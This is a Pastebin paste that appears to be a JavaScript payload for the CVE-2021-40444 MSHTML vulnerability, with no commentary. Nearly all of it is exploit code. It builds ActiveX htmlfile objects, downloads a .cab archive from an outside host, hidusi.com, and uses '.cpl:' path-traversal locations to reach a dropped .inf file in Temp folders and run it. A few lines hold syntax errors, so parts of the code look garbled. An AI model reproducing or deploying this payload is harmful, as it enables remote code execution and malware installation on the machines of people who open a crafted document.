0xecutor

Exploit-CVE2021-40444 html/script payload

Sep 9th, 2021 (edited)
1,521
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function(){
  2.  
  3.     try{
  4.         window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
  5.             window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  6.     }catch(_0x1c747c){
  7.         window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
  8.             window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  9.     }
  10.     iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
  11.     window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
  12.  
  13.     try{
  14.         window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
  15.             window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  16.     }catch(_0x5afb73){
  17.         window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
  18.             window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  19.     }
  20.  
  21.     iframeActxHtml1['open']()['close']();
  22.     var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');
  23.     iframeActxHtml2['open']()['close']();
  24.     iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');
  25.     iframeActxHtml3['open']()['close']();
  26.     var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');
  27.     iframeActxHtml4['open']()['close']();
  28.     var actx_html_0=new ActiveXObject('htmlfile'),
  29.     actx_html_1=new ActiveXObject('htmlfile'),
  30.     actx_html_2=new ActiveXObject('htmlfile'),
  31.     actx_html_3=new ActiveXObject('htmlfile'),
  32.     actx_html_4=new ActiveXObject('htmlfile'),
  33.     actx_html_5=new ActiveXObject('htmlfile'),
  34.     xmlhttpreq1=new window['XMLHttpRequest'](),
  35.     window['setTimeout']=window['setTimeout'];
  36.     window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://hidusi.com/e273caf2ca371919/consist.cab',![]),
  37.     window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
  38.     iframeActxHtml4['Script']['document']['write']('<body>');
  39.     var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
  40.     cabloadunpack['setAttribute']('codebase','http://hidusi.com/e273caf2ca371919/consist.cab#version=5,0,0,0');
  41.     cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
  42.     window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
  43.     actx_html_0['Script']['location']='.cpl:123',
  44.     actx_html_0['Script']['location']='.cpl:123',
  45.     actx_html_0['Script']['location']='.cpl:123',
  46.     actx_html_0['Script']['location']='.cpl:123',
  47.     actx_html_0['Script']['location']='.cpl:123',
  48.     actx_html_0['Script']['location']='.cpl:123',
  49.     actx_html_0['Script']['location']='.cpl:123',
  50.     actx_html_0['Script']['location']='.cpl:123',
  51.     actx_html_0['Script']['location']='.cpl:123',
  52.     actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/strategy.inf',
  53.     actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/strategy.inf',
  54.     actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/strategy.inf',
  55.     actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/strategy.inf',
  56.     actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/strategy.inf',
  57.     actx_html_3['Script']['location']='.cpl:../../../../../Temp/strategy.inf',
  58.     actx_html_3['Script']['location']='.cpl:../../Low/strategy.inf',
  59.     actx_html_3['Script']['location']='.cpl:../../strategy.inf';
  60. }()
  61.  
RAW Paste Data